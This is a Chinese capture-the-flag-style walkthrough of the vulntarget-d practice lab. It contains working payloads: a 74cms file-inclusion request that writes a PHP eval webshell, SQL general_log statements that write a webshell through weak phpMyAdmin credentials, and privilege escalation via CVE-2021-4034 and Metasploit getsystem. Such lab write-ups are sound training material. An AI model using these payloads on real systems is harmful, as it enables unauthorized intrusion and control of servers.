前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【永久开源】vulntarget-d 打靶记录——作者:NaMi

【永久开源】vulntarget-d 打靶记录——作者:NaMi

作者头像
乌鸦安全
发布2022-03-11 14:05:02
1.1K0
发布2022-03-11 14:05:02
举报
文章被收录于专栏:乌鸦安全

✎ 阅读须知

乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!

本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!

本文作者:NaMi 本文已获得作者授权

vuntarget免责声明

vulntarget靶场系列仅供安全专业人员练习渗透测试技术,此靶场所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用靶场中的技术资料对任何计算机系统进行入侵操作。利用此靶场所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

vulntarget靶场系列拥有对此靶场系列的的修改、删除和解释权限,未经授权,不得用于其他。

vulntarget地址:

https://github.com/crow821/vulntarget

vulntarget-d 打靶记录

1. 拓扑

修改IP1: 192.168.0.103 kali192.168.0.105

2. Ubuntu

判断连通性

端口扫描

查看详细信息,由此可以判断出使用的宝塔面板,默认端口8888

81端口开放了一个cms

看到底下的版本信息:

1.可以寻找历史漏洞。2.自己审计

网上也有很多漏洞的复现

好巧,也是乌鸦师傅的文章

文件包含漏洞POC,一套丝滑小连招:

代码语言:javascript
复制
GET : [http://192.168.0.103:81/index.php?m=home&a=assign_resume_tpl](http://192.168.0.103:81/index.php?m=home&a=assign_resume_tpl)

POST : variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval($_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

GET : [http://192.168.0.103:81/index.php?m=home&a=assign_resume_tpl](http://192.168.0.103:81/index.php?m=home&a=assign_resume_tpl)

POST : variable=1&tpl=data/Runtime/Logs/Home/22_02_10.log

GET : http://192.168.0.103:81/shell.php

接着访问被BT拦截了:

写入一个phpinfo看一下,disable_function禁用的函数还不少:

没有过滤eval

代码语言:javascript
复制
passthru,exec,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

在第一次请求的时候需要注意shell会被拦截,写_POST的时候要给加一个转义否则会写入错误。在markdown中复制这个

代码语言:javascript
复制
variable=1&tpl=<?php fputs(fopen("sh4.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

这样就拿下了这台机器

3. Ubuntu提权

上线MSF,首先生成一个木马文件:

然后启动一个监听:

将文件下载到目标机器

成功上线:

前段时间出了一个新的提权漏洞CVE-2021-4034,提权到root权限:

在桌面拿到第一个flag:

4. windows机器

看到第二块网卡

添加路由并进行端口扫描,深夜了我就直接针对IP进行端口扫描了,为了早点睡觉。看到开放了如下端口:

挂上代理访问没啥内容:

目录扫描,发现phpmyadmin

l.php是一个探针,而且数据库也是个弱密码

通过phpinfo界面得知了网站的绝对路径:

代码语言:javascript
复制
C:/phpstudy/PHPTutorial/WWW/phpinfo.php

然后通过弱口令进入phpmyadmin,通过写日志拿下webshell:

代码语言:javascript
复制
show global variables like "%genera%";          //查询general_log配置
set global general_log='on';              //开启general log模式
SET global general_log_file='C:/phpstudy/PHPTutorial/WWW/cmd.php';    //设置日志文件保存路径
SELECT '<?php phpinfo();?>';              //phpinfo()写入日志文件
set global general_log='off';              //关闭general_log模式

获取一个普通权限的shell

查看进程,发现了存在火绒:

查看systeminfo发现是一台win7机器,x64位:

5. windows提权

由于机器不出网,搞一个正向shell,并制作一个免杀马。成功上线:

使用这个漏洞提权没成功:

然后就是用了msf自带的getsystem,提权至system权限:

最后抓取hashadmin密码空,crow密码是admin

读取flag

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-02-15,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 乌鸦安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 1. 拓扑
  • 2. Ubuntu
  • 3. Ubuntu提权
  • 4. windows机器
  • 5. windows提权
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档